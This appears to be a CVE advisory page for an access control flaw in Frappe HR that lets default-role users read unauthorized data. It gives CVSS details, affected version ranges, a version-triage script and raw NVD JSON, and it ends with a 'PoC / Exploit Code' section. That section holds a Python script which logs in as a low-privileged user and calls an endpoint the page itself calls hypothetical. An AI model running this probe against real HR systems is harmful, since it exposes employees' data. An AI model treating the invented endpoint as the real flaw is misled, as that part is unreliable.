Security Vulnerability Report
CVE-2026-40888 CVSS 6.5 MEDIUM


Published: 2026-04-21 20:17:03
Last Modified: 2026-04-27 19:39:35

Description

Frappe HR is an open-source human resources management solution (HRMS). Prior to versions 15.58.1 and 16.4.1, an authenticated user holding only the default role can read information they are not authorized to see by calling a certain API endpoint; this description does not name the endpoint. The weakness is classified as CWE-284 (Improper Access Control). Versions 15.58.1 and 16.4.1 contain a patch. No known workarounds are available, so upgrading is the only remediation.

CVSS Details

CVSS Score
6.5
Severity
MEDIUM
CVSS Vector
CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N

Configurations (Affected Products)

cpe:2.3:a:frappe:frappe_hr:*:*:*:*:*:*:*:* (versionEndExcluding 15.58.1) - VULNERABLE
cpe:2.3:a:frappe:frappe_hr:*:*:*:*:*:*:*:* (versionStartIncluding 16.0.0, versionEndExcluding 16.4.1) - VULNERABLE
Frappe HR < 15.58.1 (no lower bound in the NVD record)
Frappe HR >= 16.0.0 and < 16.4.1
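As an added check, not code from the advisory, NVD or the Frappe project, the following Python turns the two NVD cpeMatch ranges above into a version test. It assumes the installed version is read from the output of `bench version` on the host, whose one-"app version"-per-line format is an assumption here; the sample output is constructed.

```python
"""Triage an installed Frappe HR version against the CVE-2026-40888 ranges.

Added example; not code from the advisory, NVD or the Frappe project.
The two ranges are the cpeMatch entries in the NVD record for this CVE:
  - no lower bound, versionEndExcluding 15.58.1
  - versionStartIncluding 16.0.0, versionEndExcluding 16.4.1
"""
from __future__ import annotations

from typing import Optional

# (versionStartIncluding, versionEndExcluding) per NVD; None = no lower bound.
AFFECTED_RANGES: list[tuple[Optional[str], str]] = [
    (None, "15.58.1"),
    ("16.0.0", "16.4.1"),
]

# Constructed sample in the one-"app version"-per-line shape that
# `bench version` prints (format assumed here, not taken from the page).
SAMPLE_BENCH_OUTPUT = """\
erpnext 15.61.0
frappe 15.64.0
hrms 15.57.3
"""


def parse_version(v: str) -> tuple[int, ...]:
    """'v15.57.3' or '15.57.3' -> (15, 57, 3).

    A leading 'v' (as on the GitHub release tags) is tolerated; anything
    that is not dotted integers is rejected rather than compared as text,
    because '15.9.0' > '15.58.1' as strings would give a wrong verdict.
    """
    parts = v.strip().lstrip("v").split(".")
    if not all(p.isdigit() for p in parts):
        raise ValueError(f"unparseable version: {v!r}")
    return tuple(int(p) for p in parts)


def is_affected(version: str) -> bool:
    """True when version lies inside any NVD cpeMatch range for this CVE."""
    ver = parse_version(version)
    for start, end in AFFECTED_RANGES:
        if start is not None and ver < parse_version(start):
            continue  # below this range's lower bound
        if ver < parse_version(end):
            return True  # inside [start, end)
    return False


def app_version_from_bench(output: str, app: str = "hrms") -> Optional[str]:
    """Pull one app's version out of `bench version`-style output."""
    for line in output.splitlines():
        fields = line.split()
        if len(fields) >= 2 and fields[0] == app:
            return fields[1]
    return None


def triage(output: str) -> dict:
    """Report whether the hrms app in the bench output needs patching."""
    version = app_version_from_bench(output)
    if version is None:
        return {"version": None, "affected": None, "note": "hrms not installed"}
    affected = is_affected(version)
    fixed_in = None
    if affected:
        # NVD lists no separate fix below the 15 branch, so anything under
        # 16.0.0 is pointed at 15.58.1; 16.x goes to 16.4.1.
        fixed_in = "16.4.1" if parse_version(version) >= (16,) else "15.58.1"
    return {"version": version, "affected": affected, "fixed_in": fixed_in}


if __name__ == "__main__":
    print(triage(SAMPLE_BENCH_OUTPUT))
```

The comparison is done on integer tuples rather than strings on purpose: a lexical compare would rank 15.9.0 above 15.58.1 and mark a vulnerable install as fixed. Note also that 15.99.0 is not affected while 16.0.0 is, because the 16 branch got its own fix in 16.4.1.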

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only. The API path it requests is a placeholder: the description above does not identify the affected method, so the script only demonstrates the shape of the test (authenticate as a default-role user, call the endpoint, inspect what comes back) and must be pointed at the real endpoint before it proves anything.
```python
import requests

# Target configuration. The endpoint below is a placeholder: the advisory text
# on this page does not name the affected API method, so this path is
# hypothetical and must be replaced with the real one.
target_url = "http://target-instance.com"
vulnerable_api = "/api/method/frappe.hr.doctype.employee.employee.get_details"  # Hypothetical endpoint

# Authenticate as a low-privileged user (default role). A successful
# /api/method/login sets the session cookie on the requests.Session.
session = requests.Session()
login_data = {"usr": "employee", "pwd": "password"}
login = session.post(f"{target_url}/api/method/login", data=login_data)
login.raise_for_status()  # stop here if the credentials are wrong

# Exploit: call the endpoint with the low-privileged session and see whether
# it returns data the role should not be able to read. A patched instance
# should reject the call (typically HTTP 403 for a Frappe PermissionError);
# a 200 alone is not proof, so inspect the returned body, not just the status.
response = session.get(f"{target_url}{vulnerable_api}")
if response.status_code == 200:
    print("[+] Vulnerability Exploited Successfully")
    print("[+] Leaked Data:", response.json())
else:
    print("[-] Exploit Failed")
```

References

https://github.com/frappe/hrms/security/advisories/GHSA-4375-7rxj-9hfx (Vendor Advisory)
https://github.com/frappe/hrms/releases/tag/v15.58.1 (Release Notes)
https://github.com/frappe/hrms/releases/tag/v16.4.1 (Release Notes)

Raw JSON Data

```json
{
  "cve": {
    "id": "CVE-2026-40888",
    "sourceIdentifier": "[email protected]",
    "published": "2026-04-21T20:17:02.537",
    "lastModified": "2026-04-27T19:39:35.313",
    "vulnStatus": "Analyzed",
    "cveTags": [],
    "descriptions": [
      {
        "lang": "en",
        "value": "Frappe HR is an open-source human resources management solution (HRMS). Prior to versions 15.58.1 and 16.4.1, an authenticated user with default role can access unauthorized information by exploiting certain api endpoint. Versions 15.58.1 and 16.4.1 contain a patch. No known workarounds are available."
      }
    ],
    "metrics": {
      "cvssMetricV30": [
        {
          "source": "[email protected]",
          "type": "Secondary",
          "cvssData": {
            "version": "3.0",
            "vectorString": "CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N",
            "baseScore": 6.5,
            "baseSeverity": "MEDIUM",
            "attackVector": "NETWORK",
            "attackComplexity": "LOW",
            "privilegesRequired": "LOW",
            "userInteraction": "NONE",
            "scope": "UNCHANGED",
            "confidentialityImpact": "HIGH",
            "integrityImpact": "NONE",
            "availabilityImpact": "NONE"
          },
          "exploitabilityScore": 2.8,
          "impactScore": 3.6
        }
      ]
    },
    "weaknesses": [
      {
        "source": "[email protected]",
        "type": "Primary",
        "description": [
          { "lang": "en", "value": "CWE-284" }
        ]
      }
    ],
    "configurations": [
      {
        "nodes": [
          {
            "operator": "OR",
            "negate": false,
            "cpeMatch": [
              {
                "vulnerable": true,
                "criteria": "cpe:2.3:a:frappe:frappe_hr:*:*:*:*:*:*:*:*",
                "versionEndExcluding": "15.58.1",
                "matchCriteriaId": "B2C77B83-5D4D-4AE4-9984-373F1B5DE758"
              },
              {
                "vulnerable": true,
                "criteria": "cpe:2.3:a:frappe:frappe_hr:*:*:*:*:*:*:*:*",
                "versionStartIncluding": "16.0.0",
                "versionEndExcluding": "16.4.1",
                "matchCriteriaId": "CF4E8819-D5B3-431F-B95C-4D615965CFA9"
              }
            ]
          }
        ]
      }
    ],
    "references": [
      {
        "url": "https://github.com/frappe/hrms/releases/tag/v15.58.1",
        "source": "[email protected]",
        "tags": ["Release Notes"]
      },
      {
        "url": "https://github.com/frappe/hrms/releases/tag/v16.4.1",
        "source": "[email protected]",
        "tags": ["Release Notes"]
      },
      {
        "url": "https://github.com/frappe/hrms/security/advisories/GHSA-4375-7rxj-9hfx",
        "source": "[email protected]",
        "tags": ["Vendor Advisory"]
      }
    ]
  }
}
```